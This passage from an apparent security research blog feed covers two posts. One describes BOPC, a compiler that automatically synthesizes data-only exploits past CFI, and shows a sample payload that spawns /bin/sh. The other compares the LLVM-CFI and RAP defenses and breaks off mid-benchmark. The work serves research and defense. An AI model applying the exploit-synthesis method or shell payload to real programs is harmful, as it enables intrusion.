devastating as control-flow hijacking attacks. So far, constructing data-only
attacks was cumbersome and required deep manual analysis …&lt;/p&gt;</summary><content type="html">&lt;p&gt;With the rise of strong control-flow defenses such as Control-Flow Integrity
(CFI), attackers will increasingly resort to data-only attacks that can be
equally powerful. Earlier research demonstrated that data-only attacks can be as
devastating as control-flow hijacking attacks. So far, constructing data-only
attacks was cumbersome and required deep manual analysis. We introduce the idea
of Block-Oriented Programming (BOP) where, based on a C-like programming
language and the help of constraint solving, we automatically synthesize
data-only exploits that run arbitrary payloads on host programs. The payloads
are expressed as changes to the program state that can be injected into the
program based on arbitrary read/write primitives. As input, BOP requires an
exploit written in our C dialect, a host program, a location in the program
with an arbitrary write primitive (i.e., the starting point of the exploit),
and potentially the location of an arbitrary read primitive (i.e., to bypass
ASLR). As output, our BOP compiler (BOPC) will either (i) produce a set of
program state modifications, applied through the arbitrary write primitive,
that execute the exploit program, (ii) prove that the exploit program is
unsatisfiable, i.e., that it cannot be synthesized on this host program, or
(iii) time out.&lt;/p&gt;
&lt;p&gt;We assume the host program is protected through common mitigations such as R^X,
shadow stacks (or stack canaries), ASLR, and CFI. CFI is a strong &lt;em&gt;stop the
exploit&lt;/em&gt; defense that restricts the program's control flow to valid targets.
While the control flow is guarded, the attacker is still free to make arbitrary
changes to the program state. These program state changes allow the attacker to
bend the control flow to unintended functionality.  While CFI restricts
execution to the program functionality, it does not restrict how this
functionality is used. This gap allows the attacker to expose any functionality
by bending control flow to that functionality and controlling its parameters.
For example, an attacker may overwrite the &lt;tt class="docutils literal"&gt;is_admin&lt;/tt&gt; variable to raise their
privilege level. By corrupting program state, the attacker controls the targets
of conditional branches, enabling them to reach unintended functionality. By
corrupting function pointers with other valid targets (e.g., replacing a benign
function pointer with another function pointer in the same equivalence set, for
more details, check out the earlier &lt;a class="reference external" href="/blog/2016/0913-ControlFlowIntegrity.html"&gt;CFI blog post&lt;/a&gt;) the attacker can stitch
together different parts of the program.&lt;/p&gt;
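&lt;p&gt;The &lt;tt class="docutils literal"&gt;is_admin&lt;/tt&gt; example can be illustrated with a toy sketch (a hypothetical
program, not from the paper): no code pointer is corrupted and every executed
branch target is valid, yet overwriting one data value selects a different,
perfectly legal path through the program.&lt;/p&gt;

```python
# Toy data-only attack: the attacker's arbitrary write corrupts program
# state (is_admin), not a code pointer, so CFI has nothing to object to.

state = {"is_admin": 0}

def privileged_action():
    return "secret"

def unprivileged_action():
    return "denied"

def dispatch():
    # Both branch targets are legitimate program functionality.
    if state["is_admin"] == 1:
        return privileged_action()
    return unprivileged_action()

state["is_admin"] = 1  # simulated arbitrary write into program state
```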
&lt;div class="section" id="spl-payload"&gt;
&lt;h2&gt;SPL payload&lt;/h2&gt;
&lt;p&gt;Finding gadgets is already hard for regular ROP payloads but BOP payloads are
orders of magnitude harder to find. We therefore introduce a programming
language that allows an analyst to express BOP payloads in a high level
language. On one hand, this increases the flexibility of the search as the
language implements degrees of freedom that can be mapped to different
constructs. On the other hand, the language simplifies the task of the analyst.
We base our language on a C dialect that allows explicit use of virtual
registers (every virtual register will be mapped to a machine register but the
compiler may spill them or switch registers at arbitrary points during the
payload execution).&lt;/p&gt;
&lt;p&gt;A simple example of an &lt;tt class="docutils literal"&gt;execve&lt;/tt&gt; payload is as follows:&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
void payload() {
  string prog = &amp;quot;/bin/sh\0&amp;quot;;
  int64 * argv = { &amp;amp;prog, 0x0 };
  __r0 = &amp;amp;prog;
  __r1 = &amp;amp;argv;
  __r2 = 0;
  execve (__r0, __r1, __r2);
}
&lt;/pre&gt;
&lt;p&gt;Given the SPL payload, BOPC translates each SPL statement into a set of
constraints. These constraints are then mapped to code blocks in the host
program.&lt;/p&gt;
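&lt;p&gt;As a highly simplified sketch of this mapping (far coarser than the real
BOPC machinery): a register assignment such as &lt;tt class="docutils literal"&gt;__r2 = 0&lt;/tt&gt; becomes a constraint
on the machine state, and a candidate basic block matches if its side effects
satisfy that constraint.&lt;/p&gt;

```python
# Simplified sketch: an SPL register assignment becomes a constraint, and a
# candidate block matches if the values it writes satisfy the constraint.

def spl_constraint(virtual_reg, value):
    # e.g. __r2 = 0 requires some block to leave the mapped register at 0
    return {"reg": virtual_reg, "value": value}

def block_satisfies(block_effects, constraint):
    # block_effects maps registers to the values the block writes
    return block_effects.get(constraint["reg"]) == constraint["value"]

c = spl_constraint("__r2", 0)
candidates = [{"__r0": 7}, {"__r2": 0}]  # abstract per-block side effects
matching = [b for b in candidates if block_satisfies(b, c)]
```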
&lt;/div&gt;
&lt;div class="section" id="finding-bop-gadgets"&gt;
&lt;h2&gt;Finding BOP gadgets&lt;/h2&gt;
&lt;p&gt;BOP adapts the concept of ROP (or JOP) in an environment where changes to the
control flow are highly restricted. Classic code reuse techniques such as ROP
and JOP assume that control flow can be arbitrarily redirected to
attacker-controlled locations. For BOP, we assume that indirect control flow
transfers (both function returns and indirect jumps/calls) are highly restricted
to benign targets. To execute arbitrary computation on top of a host program,
the attacker now needs to (a) find parts of the program that implement the desired
behavior and (b) stitch these program locations together based on a valid path
in the program. In the first task, the attacker finds &lt;em&gt;gadgets&lt;/em&gt; in the program.
In the second task, the attacker connects these &lt;em&gt;gadgets&lt;/em&gt; through a path,
carefully controlling all side effects along that path through program state
adjustments. A final BOP gadget then consists of a &lt;em&gt;functional part&lt;/em&gt; that
executes the desired behavior and a &lt;em&gt;dispatcher part&lt;/em&gt; that bends execution to
the next gadget. The exploit must adjust all program state to correctly execute
both the functional part and the dispatcher part.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2018/1231/bop-gadget.png" /&gt;&lt;/p&gt;
&lt;div class="section" id="functional-blocks"&gt;
&lt;h3&gt;Functional blocks&lt;/h3&gt;
&lt;p&gt;Given the constraints from an SPL program, our compiler searches for so-called
functional blocks, i.e., code blocks that implement or satisfy a certain SPL
statement. In this step, all code blocks are analyzed and each SPL statement is
assigned the set of code blocks that could be used to implement the underlying
functionality.&lt;/p&gt;
&lt;p&gt;If any SPL statement has no corresponding functional block, BOPC returns
unsat and informs the analyst which statement is unsatisfiable.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="dispatcher-blocks"&gt;
&lt;h3&gt;Dispatcher blocks&lt;/h3&gt;
&lt;p&gt;Given the candidate functional blocks, we try to synthesize paths between
them. The process starts with two functional blocks for which we try to find a
path with satisfiable constraints. This path is then gradually extended to
three, four, five statements, until the complete program has been constructed.
The underlying problem is NP-hard and, similar to symbolic execution, the
success rate depends on the underlying heuristics and on the strategy of which
functional blocks are chosen and where path construction starts. If successful,
this step returns a path that executes the SPL payload on top of the host
program.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2018/1231/gadget-selection.png" /&gt;&lt;/p&gt;
&lt;p&gt;The image above shows the path synthesis. Starting from the blue entry point,
any selection of a functional gadget candidate restricts the feasible paths for
the second gadget. While many candidates exist, synthesizing paths is hard due
to the requirement of a satisfiable path from each gadget to the next.&lt;/p&gt;
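&lt;p&gt;The gradual extension can be sketched as a backtracking search (a toy model;
BOPC delegates the actual reachability question to a constraint solver):&lt;/p&gt;

```python
# Toy model of path synthesis: extend a partial gadget chain one functional
# block at a time, backtracking when no satisfiable dispatcher path connects
# the previous block to the next candidate.

def synthesize(chain, remaining, connectable):
    # connectable(a, b) stands in for the solver query "is there a
    # satisfiable dispatcher path from block a to block b?"
    if not remaining:
        return chain
    for block in remaining[0]:
        if not chain or connectable(chain[-1], block):
            result = synthesize(chain + [block], remaining[1:], connectable)
            if result is not None:
                return result
    return None  # no candidate for this statement connects: backtrack
```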
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="implementation-and-evaluation"&gt;
&lt;h2&gt;Implementation and evaluation&lt;/h2&gt;
&lt;p&gt;Please refer to the &lt;a class="reference external" href="http://nebelwelt.net/publications/files/18CCS.pdf"&gt;BOPC paper&lt;/a&gt; or the BOPC presentation
(in the GitHub repository) for more detail. To play with the code, check out the
readme in the &lt;a class="reference external" href="https://github.com/HexHive/BOPC"&gt;GitHub page&lt;/a&gt;. Also, for more
information on related work, please refer to the related work section in the
paper and to &lt;a class="reference external" href="https://ieeexplore.ieee.org/document/7546545"&gt;Data-oriented programming&lt;/a&gt; and &lt;a class="reference external" href="https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-hu.pdf"&gt;Automatic Generation of
Data-Oriented Exploits&lt;/a&gt;,
two earlier works on the same topic that inspired BOPC.&lt;/p&gt;
&lt;p&gt;In the paper, we evaluate BOPC using a set of 10 real programs with real
exploits. We assume that they are protected with a strong forward edge CFI
mechanism and a shadow stack on the backward edge. Using 13 SPL exploit
payloads, we evaluate whether BOPC can synthesize the payloads based on existing CVEs
as entry points. The full evaluation is again in the paper. We focus on nginx as
a case study and successfully synthesize &lt;tt class="docutils literal"&gt;execve&lt;/tt&gt;, loops, and if-else
conditions.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2018/1231/nginx-ifelse.png" /&gt;&lt;/p&gt;
&lt;p&gt;If-else condition on nginx that allows an SPL program to update state depending
on a simple conditional.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image3" src="/blog/static/2018/1231/nginx-infloop.png" /&gt;&lt;/p&gt;
&lt;p&gt;Complex arbitrary loop that allows the SPL program to, e.g., continuously read
or write data, a stepping stone for a generic information leak if, e.g., execve
is not available.&lt;/p&gt;
&lt;p&gt;As always, we release the &lt;a class="reference external" href="https://github.com/HexHive/BOPC"&gt;full BOPC code on GitHub&lt;/a&gt; and we invite you to play with the tools. A
longer readme on the GitHub page explains how you can run our SPL payloads,
describes the language, and allows you to play with different programs.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;BOPC enables fully-automatic (or mostly automatic) synthesis of data-flow
payloads that execute arbitrary computation on top of existing programs.
Exploits are encoded using a simplified C dialect and the path synthesis
leverages several heuristics to tame the NP-hard problem. Go ahead and have fun
with the code!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Hacking"></category><category term="BOP"></category><category term="ROP"></category><category term="data-only attacks"></category><category term="CFI"></category></entry><entry><title>A journey on evaluating Control-Flow Integrity (CFI): LLVM-CFI versus RAP</title><link href="/blog/2018/1226-CFIeval.html" rel="alternate"></link><published>2018-12-26T23:07:00-05:00</published><updated>2018-12-26T23:07:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2018-12-26:/blog/2018/1226-CFIeval.html</id><summary type="html">&lt;p&gt;This post started out of the need to provide a little more clarification after
a long and heated discussion on Twitter (&lt;a class="reference external" href="https://twitter.com/paxteam/status/1072598012986310662"&gt;initial discussion&lt;/a&gt; and &lt;a class="reference external" href="https://twitter.com/paxteam/status/1076089838229692416"&gt;follow up&lt;/a&gt;) about the origins
of Control-Flow Integrity (CFI), the contributions of academia, and the
precision, performance, and compatibility of different existing
implementations.&lt;/p&gt;
&lt;p&gt;CFI is a …&lt;/p&gt;</summary><content type="html">&lt;p&gt;This post started out of the need to provide a little more clarification after
a long and heated discussion on Twitter (&lt;a class="reference external" href="https://twitter.com/paxteam/status/1072598012986310662"&gt;initial discussion&lt;/a&gt; and &lt;a class="reference external" href="https://twitter.com/paxteam/status/1076089838229692416"&gt;follow up&lt;/a&gt;) about the origins
of Control-Flow Integrity (CFI), the contributions of academia, and the
precision, performance, and compatibility of different existing
implementations.&lt;/p&gt;
&lt;p&gt;CFI is a &lt;em&gt;stop the exploit&lt;/em&gt; defense that protects the control-flow of processes
in the presence of memory corruption. The threat model assumes that
an attacker can modify (read, write, update) all of the address space according
to the read/write permissions of the corresponding pages. The
mitigation restricts execution to valid control flows by checking the targets of
indirect control flow transfers (indirect calls and indirect jumps on the
forward edge or function returns on the backward edge). While many different CFI
proposals and implementations exist, most leverage a conceptual set check
(e.g., checking a set hash or checking a set id) to test if the observed target
is a valid target. Most CFI implementations are static, i.e., they rely on an
analysis pass to build the target sets and, except for the target, do not need
any writable data (that could be modified by the adversary) in the process.&lt;/p&gt;
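&lt;p&gt;Conceptually, the inserted set check can be modeled as follows (a toy model
in Python, not any particular implementation): the static analysis labels every
function with the id of its target set, and every indirect transfer verifies
the label before jumping.&lt;/p&gt;

```python
# Toy model of a type-based CFI set check: functions are grouped by
# prototype into target sets, and each indirect call verifies that the
# target carries the expected set id before transferring control.

SET_ID = {}  # function mapped to its set id, computed "statically"

def label(set_id):
    def register(fn):
        SET_ID[fn] = set_id
        return fn
    return register

@label("void(void)")
def benign():
    return "benign"

@label("int(int)")
def other(x):
    return x

def indirect_call(fn, expected_set, *args):
    if SET_ID.get(fn) != expected_set:
        raise RuntimeError("CFI violation")  # conceptual trap, aborts
    return fn(*args)
```

&lt;p&gt;Any function in the same set as the original target still passes the check,
which is exactly the imprecision discussed below.&lt;/p&gt;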
&lt;p&gt;Without memory corruption, only a single target is valid for each executed
indirect control-flow transfer, but because the CFI property is static, all
targets in the set must be accepted (i.e., the implementations are neither
context nor path sensitive). Similarly, due to imprecision in the
analysis, the target sets are an over-approximation. In practice, most
implementations use a type-based analysis and group all functions with the same
prototype into a target set. These two imprecisions allow the attacker to
replace the original target with another one from the target set without
triggering the defense. The power of CFI as a mitigation is therefore tied to
the size of the sets. Intuitively, the smaller the sets, the stronger the
defense.&lt;/p&gt;
&lt;p&gt;For the backward edge, a set check is insufficient due to the massive amount of
over-approximation. In its most precise form, set checking leverages the
function symbol to match the return sites for each call of that function. Most
implementations similarly leverage the function prototype to match the return
site. This means that from a &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;void(*)(void)&lt;/span&gt;&lt;/tt&gt; function you can return to the point
after the call of &lt;em&gt;any&lt;/em&gt; &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;void(*)(void)&lt;/span&gt;&lt;/tt&gt; function, often resulting in huge
target sets. These over-approximations (both for function name and function
prototype matching) result in an opportunity for the attacker to short-circuit
different parts of the program. For example, two calls to &lt;tt class="docutils literal"&gt;printf&lt;/tt&gt; in the same
function allow the attacker to implement a loop where the return in the second
call is overwritten to the first call.  This shortcutting becomes a powerful
primitive, often resulting in arbitrary computation (see &lt;a class="reference external" href="http://nebelwelt.net/publications/files/15SEC.pdf"&gt;Control-Flow Bending&lt;/a&gt; for details). To protect
the backward edge, we therefore recommend stack integrity through a &lt;a class="reference external" href="https://arxiv.org/abs/1811.03165"&gt;shadow
stack&lt;/a&gt; or &lt;a class="reference external" href="http://nebelwelt.net/publications/files/14OSDI.pdf"&gt;safe stack&lt;/a&gt;. Intel CET is a promising
upcoming hardware implementation of a shadow stack and the &lt;a class="reference external" href="https://clang.llvm.org/docs/ShadowCallStack.html"&gt;LLVM shadow stack&lt;/a&gt; is a strong software
implementation for aarch64.&lt;/p&gt;
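&lt;p&gt;The shadow-stack idea can be modeled in a few lines (a toy model, ignoring
the isolation of the shadow region that real implementations must provide):&lt;/p&gt;

```python
# Toy shadow stack: every call pushes the return address onto a separate,
# protected stack; every return compares the (corruptible) on-stack return
# address against the shadow copy and traps on a mismatch.

shadow = []

def on_call(return_address):
    shadow.append(return_address)

def on_return(address_from_regular_stack):
    expected = shadow.pop()
    if expected != address_from_regular_stack:
        raise RuntimeError("shadow stack mismatch: return address corrupted")
    return address_from_regular_stack
```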
&lt;p&gt;We have extensively discussed CFI in &lt;a class="reference external" href="/blog/2016/0913-ControlFlowIntegrity.html"&gt;an earlier blog post&lt;/a&gt;, &lt;a class="reference external" href="http://nebelwelt.net/publications/files/17CSUR.pdf"&gt;a survey&lt;/a&gt;, and also as part of our
&lt;a class="reference external" href="http://nebelwelt.net/publications/files/18CCS.pdf"&gt;BOPC&lt;/a&gt;, &lt;a class="reference external" href="http://nebelwelt.net/publications/files/18NDSS.pdf"&gt;CFIXX&lt;/a&gt;, &lt;a class="reference external" href="http://nebelwelt.net/publications/files/16EUROSP.pdf"&gt;Kernel CFI&lt;/a&gt;, &lt;a class="reference external" href="http://nebelwelt.net/publications/files/15SEC.pdf"&gt;Control-Flow Bending&lt;/a&gt;, &lt;a class="reference external" href="http://nebelwelt.net/publications/files/15DIMVA.pdf"&gt;Lockdown&lt;/a&gt;, and &lt;a class="reference external" href="http://nebelwelt.net/publications/files/14OSDI.pdf"&gt;CPI&lt;/a&gt; papers. For a quick
overview, I recommend the blog post, for a deeper comparison, I recommend the
survey.&lt;/p&gt;
&lt;div class="section" id="history-of-taming-control-flow"&gt;
&lt;h2&gt;History of taming control flow&lt;/h2&gt;
&lt;p&gt;Multiple sources claim ownership of the idea of restricting control-flow based
on set checks. The &lt;a class="reference external" href="https://www.microsoft.com/en-us/research/wp-content/uploads/2005/11/ccs05.pdf"&gt;original 2005 CFI paper&lt;/a&gt;
coined the term control-flow integrity, formalized the property for forward and
backward edge, and evaluated a prototype implementation (that was not released
openly). The same authors &lt;a class="reference external" href="https://users.soe.ucsc.edu/~abadi/Papers/cfi-tissec-revised.pdf"&gt;revisited CFI in 2007&lt;/a&gt; and proposed
a shadow stack to protect return targets.&lt;/p&gt;
&lt;p&gt;In 2003 PaXTeam wrote in their &lt;a class="reference external" href="https://web.archive.org/web/20070614031245/https://pax.grsecurity.net/docs/pax-future.txt"&gt;future ideas&lt;/a&gt;
text file about protecting function pointers and returns. For function pointers
(c1), they propose to make the function pointers themselves read-only. This
approach would fundamentally solve the problem. Read-only function pointers are
&lt;em&gt;precise&lt;/em&gt; as an attacker can no longer overwrite the function pointer itself.
This approach unfortunately does not scale due to transitivity: an attacker can
still modify a pointer to the function pointer. Similar to how non-executable
data pages did not prohibit ROP, read-only function pointers do not stop
control-flow hijacking.  Control-flow hijacking becomes harder as the attacker
now must control an additional layer of indirection.  For returns (c2), they
propose a set check based on the function prototype, similar to the original CFI
paper. Unfortunately, this idea was not implemented and the future ideas text
file was not well known and therefore not cited in the Abadi CFI paper.&lt;/p&gt;
&lt;p&gt;After we were made aware of this text file in about 2016, we started giving
credit for the idea of restricting dynamic control flow. Given the very short
description, the exclusive focus on returns for the control-flow check, and the lack
of an implementation or evaluation, the future ideas file can serve as
inspiration but does not provide a convincing case for CFI and should therefore
not serve as the main citation for CFI. The PaX future ideas text file may be
credited for the idea of restricting control-flow as a defense together with
other related work from the same time such as &lt;a class="reference external" href="https://www.usenix.org/conference/11th-usenix-security-symposium/secure-execution-program-shepherding"&gt;program shepherding&lt;/a&gt;
from 2002.&lt;/p&gt;
&lt;p&gt;But as it turns out, the idea of taming control-flow is much older than PaX.
Hoelzle, Chambers, and Ungar proposed the idea of &lt;a class="reference external" href="http://www.selflanguage.org/_static/published/pics.pdf"&gt;polymorphic inline caches&lt;/a&gt; in 1991, which replace
indirect calls with a type check and a direct call, similar to the CFI set
check. A type mismatch could be detected and result in termination of the
program. Going back even further, Deutsch and Schiffman explored &lt;a class="reference external" href="https://dl.acm.org/citation.cfm?id=800542"&gt;inline caches
for Smalltalk-80&lt;/a&gt; in 1984. (Thanks
to Stefan Brunthaler for the references and discussion.)&lt;/p&gt;
&lt;p&gt;The idea of taming indirect control flow is ancient with research in runtime
systems, programming languages, hardware architectures, compilers, and defenses.
This old legacy is rarely cited in the newer papers but may deserve a revisit.
It may be worthwhile to start conducting computer science archaeology as
academics regularly miss related work.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="evaluating-cfi"&gt;
&lt;h2&gt;Evaluating CFI&lt;/h2&gt;
&lt;p&gt;The defense power of CFI is program dependent. Under the powerful attacker
model, the usefulness of CFI depends on whether the target set contains
the necessary gadget(s) that are useful for the attacker. In addition to
security, two other properties that can be evaluated are performance and
compatibility. LLVM-CFI has negligible (less than 1%) performance overhead on
standard benchmarks such as SPEC CPU2006 and we will not repeat the measurements
here.&lt;/p&gt;
&lt;p&gt;We evaluate LLVM-CFI (version 4.0.1) and RAP (via the 4.9.24-test7 patch), two
CFI mechanisms that implement prototype-based set checks for the forward edge.
RAP also offers prototype-based set checks on the backward edge but, due to the
security concerns mentioned above, we will restrict the evaluation to the
forward edge. Our tests focus on user-space code.&lt;/p&gt;
&lt;div class="section" id="using-llvm-cfi"&gt;
&lt;h3&gt;Using LLVM-CFI&lt;/h3&gt;
&lt;p&gt;LLVM-CFI is extremely easy to use. Install a recent
LLVM through your favorite package manager, e.g., through &lt;tt class="docutils literal"&gt;apt install
&lt;span class="pre"&gt;clang-3.8&lt;/span&gt;&lt;/tt&gt; for the current Debian default. To activate LLVM-CFI runtime
checking, simply compile your software with &lt;tt class="docutils literal"&gt;clang &lt;span class="pre"&gt;-flto&lt;/span&gt; &lt;span class="pre"&gt;-fsanitize=cfi&lt;/span&gt;
test.c&lt;/tt&gt;. There's also plenty of &lt;a class="reference external" href="https://clang.llvm.org/docs/ControlFlowIntegrity.html"&gt;documentation available&lt;/a&gt; if you need to know
more.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="using-rap"&gt;
&lt;h3&gt;Using RAP&lt;/h3&gt;
&lt;p&gt;The story for RAP is more involved, and compiling the underlying GCC
plugin is &lt;em&gt;slightly&lt;/em&gt; more complicated (yes, this is sarcastic). The first
challenge is to discover the actual source. The history behind RAP is somewhat
obscure, as no official write-up or code repository exists. The only hints are
&lt;a class="reference external" href="https://twitter.com/paxteam"&gt;&amp;#64;paxteam&lt;/a&gt; on twitter and a &lt;a class="reference external" href="https://pax.grsecurity.net/docs/PaXTeam-H2HC15-RAP-RIP-ROP.pdf"&gt;H2H presentation&lt;/a&gt;.  Without an
official release, I resorted to searching the old PaX Linux patches as they
apparently contained a &amp;quot;public&amp;quot; version of RAP. The most recent patch I found
was &lt;a class="reference external" href="https://www.grsecurity.net/~paxguy1/pax-linux-4.9.24-test7.patch"&gt;pax-linux-4.9.24-test7.patch&lt;/a&gt;. Download
the patch and apply it against the &lt;a class="reference external" href="http://ftp.ntu.edu.tw/linux/kernel/v4.x/linux-4.9.24.tar.gz"&gt;linux-4.9.24.tar.gz&lt;/a&gt; tarball. Enter
the unpacked source tree and run &lt;tt class="docutils literal"&gt;make menuconfig&lt;/tt&gt; to select a reasonable configuration.
For some reason, the patch did not change Kconfig and the options for RAP did
not show up. I therefore had to manually edit the &lt;tt class="docutils literal"&gt;.config&lt;/tt&gt; file and make sure
the following entries were selected:&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
CONFIG_HAVE_GCC_PLUGINS=y
CONFIG_GCC_PLUGINS=y
CONFIG_PAX_RAP=y
&lt;/pre&gt;
&lt;p&gt;After selecting this configuration, the plugin is compiled as a side effect
of building the kernel through &lt;tt class="docutils literal"&gt;make&lt;/tt&gt;. After the compilation finishes, you can
grab the plugin from
&lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;linux-4.9.24-pax/scripts/gcc-plugins/rap_plugin/rap_plugin.so&lt;/span&gt;&lt;/tt&gt; and RAP is
ready to use, provided you know the command-line arguments. As no documentation exists
for RAP, I once again resorted to the code and discovered the following
command-line switches in the Makefiles:&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
CFLAGS=-DRAP_PLUGIN -fplugin-arg-rap_plugin-typecheck=call,ret
CFLAGS+=-fplugin-arg-rap_plugin-hash=abs-finish
CFLAGS+=-fplugin-arg-rap_plugin-hash=abs-ops
CFLAGS+=-fplugin-arg-rap_plugin-hash=abs-attr
CFLAGS+=-fplugin-arg-rap_plugin-report=func,fptr,abs
CFLAGS+=-DX86_RAP_CALL_VECTOR=0x82
CFLAGS+=-DX86_RAP_RET_VECTOR=0x83
CFLAGS+= '-fplugin-arg-rap_plugin-callabort=int $$0x82'
CFLAGS+= '-fplugin-arg-rap_plugin-retabort=int $$0x83'
CFLAGS+= -DRAP_PLUGIN
&lt;/pre&gt;
&lt;p&gt;My educated guess is that the first line activates RAP for calls and returns
while lines two through four activate higher precision depending on parts of the
function prototype. The report switch on line five prints debug information
about the hashes (and can be incredibly helpful when debugging RAP). The remaining
lines select how traps are handled. With this information, we are ready to use
RAP for test software.&lt;/p&gt;
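&lt;p&gt;Putting the pieces together, a hypothetical invocation for a standalone test
file could look like the following sketch. The plugin path, output name, and the
subset of switches are assumptions on my part, derived from the Makefile snippet
above, and may need adjusting:&lt;/p&gt;

```shell
# Compile test.c with the RAP plugin extracted from the kernel build.
# Adjust the path to wherever rap_plugin.so ended up on your system.
gcc -DRAP_PLUGIN \
    -fplugin=./rap_plugin.so \
    -fplugin-arg-rap_plugin-typecheck=call,ret \
    -fplugin-arg-rap_plugin-report=func,fptr,abs \
    '-fplugin-arg-rap_plugin-callabort=int $0x82' \
    '-fplugin-arg-rap_plugin-retabort=int $0x83' \
    -O3 -o test test.c
```

&lt;p&gt;Note that the &lt;tt class="docutils literal"&gt;$$&lt;/tt&gt; in the Makefile snippet is Make's escaping for a
literal &lt;tt class="docutils literal"&gt;$&lt;/tt&gt;, so a direct shell invocation uses a single &lt;tt class="docutils literal"&gt;$&lt;/tt&gt;.&lt;/p&gt;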
&lt;p&gt;Getting to this stage required about 10-15 hours of software archaeology and
pointers from &lt;a class="reference external" href="https://twitter.com/lazytyped"&gt;&amp;#64;lazytyped&lt;/a&gt;, &lt;a class="reference external" href="https://twitter.com/raistolo"&gt;&amp;#64;raistolo&lt;/a&gt;, and &lt;a class="reference external" href="https://twitter.com/stevecheckoway"&gt;&amp;#64;stevecheckoway&lt;/a&gt; who reached out to help after a heated
discussion on Twitter.&lt;/p&gt;
&lt;p&gt;Orthogonally, I received a lot of love from the Twitter &amp;quot;hacker&amp;quot; community,
e.g., I now know that I'm a useless incompetent academic who is too stupid to
read code and several other things that I was not aware of before. Thanks folks,
I love you too! A core aspect of hacker culture is to share information and to help, not to
attack others who are trying to reproduce and understand.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="precision-measurements"&gt;
&lt;h3&gt;Precision measurements&lt;/h3&gt;
&lt;p&gt;Precision is an important property for CFI. Strict CFI defenses may result in
false positives where an execution of a program is stopped even without an
attacker modifying memory. For example, if a function pointer is cast to a
different type, dereferencing it may result in a CFI violation. LLVM-CFI
enforces strict prototype checking and may therefore cause &lt;a class="reference external" href="https://blog.trailofbits.com/2017/02/20/the-challenges-of-deploying-security-mitigations/"&gt;incompatibilities&lt;/a&gt;
with existing code that relies on loose function pointer casts.&lt;/p&gt;
&lt;p&gt;Both LLVM-CFI and RAP implement CFI checks based on function prototype matching:
function prototypes are encoded to some type mask (in the case of RAP) or to
some ID (for LLVM-CFI). Both policies detect if any aspect of the function
prototype is changed, e.g., the type of a parameter or the return type. Both
policies are precise and check for specific pointer types.&lt;/p&gt;
&lt;p&gt;There is one key difference between RAP and LLVM-CFI: LLVM-CFI only allows calls
to functions that are address-taken, i.e., only functions that had their address
taken through the address-of operator can be called indirectly.
Functions that are not address-taken cannot be targets. The underlying idea
behind this check is that only a small subset of all functions are called
indirectly and LLVM-CFI reduces the size of their target sets this way (instead
of all &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;void(*)(void)&lt;/span&gt;&lt;/tt&gt; functions only the &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;void(*)(void)&lt;/span&gt;&lt;/tt&gt; functions that
have their address taken are in the set of valid targets). This vastly reduces
the size of the sets. The power to distinguish between address-taken and
not-address-taken functions comes at a price: LLVM-CFI requires &lt;tt class="docutils literal"&gt;&lt;span class="pre"&gt;-flto&lt;/span&gt;&lt;/tt&gt; (link
time optimization) to decide if a function is address taken anywhere in the
program. RAP here trades precision for simplicity.&lt;/p&gt;
&lt;p&gt;Both LLVM-CFI and RAP fail to detect a compromise of the function pointer if it
is overwritten with an address-taken function. Note that this imprecision is
expected from any type-based CFI mechanism.&lt;/p&gt;
&lt;p&gt;To conclude, both LLVM-CFI and RAP implement CFI through type-based prototype
matching. LLVM-CFI only matches address-taken functions while RAP matches all
functions (resulting in some imprecision).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="performance"&gt;
&lt;h3&gt;Performance&lt;/h3&gt;
&lt;p&gt;We run the performance test by indirectly dispatching a tiny function many
times, using the &lt;tt class="docutils literal"&gt;rdtsc&lt;/tt&gt; time stamp counter to count the number of cycles
for each dispatch (including the execution of the function). We run the
benchmark on a mobile Intel Core i7-7500 at 2.7GHz running the performance
governor. We compile the code with O3 and average 5 executions after one warmup. The
dispatch code is:&lt;/p&gt;
&lt;pre class="code literal-block"&gt;
__attribute__((noinline)) int quickfun(int a, int b) {
  __asm__ volatile(&amp;quot;nop\n&amp;quot;);
  return a*b;
}
...
int (*ptr)(int, int) = &amp;amp;quickfun;
__asm__ volatile ( &amp;quot;rdtsc&amp;quot; : &amp;quot;=a&amp;quot; (lo), &amp;quot;=d&amp;quot; (hi));
start = lo | (hi &amp;lt;&amp;lt; 32);
for (unsigned long i = 0; i &amp;lt; NRSPEED; i++)
  ptr(a, b);
__asm__ volatile ( &amp;quot;rdtsc&amp;quot; : &amp;quot;=a&amp;quot; (lo), &amp;quot;=d&amp;quot; (hi));
end = lo | (hi &amp;lt;&amp;lt; 32);
&lt;/pre&gt;
&lt;p&gt;Note that this microbenchmark only provides a very rough estimate of the
performance for one kind of dispatch. As a microbenchmark, it tries to show
worst case performance overhead for the protected dispatch.&lt;/p&gt;
&lt;p&gt;Amazingly, RAP has no measurable performance overhead. Without RAP, gcc
compiles the code to execute in 4.172 cycles per dispatch. With RAP, the same
code executes in 4.173 cycles per dispatch. This is less than 0.04% overhead.&lt;/p&gt;
&lt;p&gt;LLVM-CFI results in some overhead. Without CFI, LLVM compiles the code to
execute in 4.179 cycles per dispatch. With LLVM-CFI, the code executes in 5.012
cycles per dispatch. This is about 19.93% overhead for a pure dispatch.&lt;/p&gt;
&lt;p&gt;Let's dive into the compiled code to see where the overhead comes from. Let's
start with RAP. The hot loop is compiled to:&lt;/p&gt;
